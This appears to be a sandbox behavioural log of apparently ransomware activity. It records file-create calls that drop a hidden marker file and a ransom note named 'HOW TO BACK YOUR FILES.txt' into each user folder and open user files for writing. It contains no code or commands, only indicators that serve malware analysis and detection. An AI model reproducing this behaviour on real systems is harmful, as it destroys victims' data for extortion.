Create C:\Users\FD1HVy\My Documents\My Videos\9ons\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\2eLTi4fiQ5NoAFf\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\2eLTi4fiQ5NoAFf\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\2eLTi4fiQ5NoAFf\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Shapes\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Shapes\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Shapes\Favorites.vssx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Shapes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Shapes\_private\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Shapes\_private\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDBtmp.log desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Pictures\Saved Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Pictures\Saved Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Pictures\Camera Roll\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Pictures\Camera Roll\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\vedatamodel.edb desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\vedatamodel.jfm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\counters2.dat desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\Local\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\Local\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\Local\Microsoft\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\Local\Microsoft\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\IE\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\IE\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\Content.IE5\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\Content.IE5\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\Content.IE5\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\IE\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\IE\container.dat desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\IE\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.Word\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.Word\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.MSO\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.MSO\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.MSO\VisioLogFiles\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.MSO\VisioLogFiles\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.IE5\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.IE5\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.IE5\container.dat desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
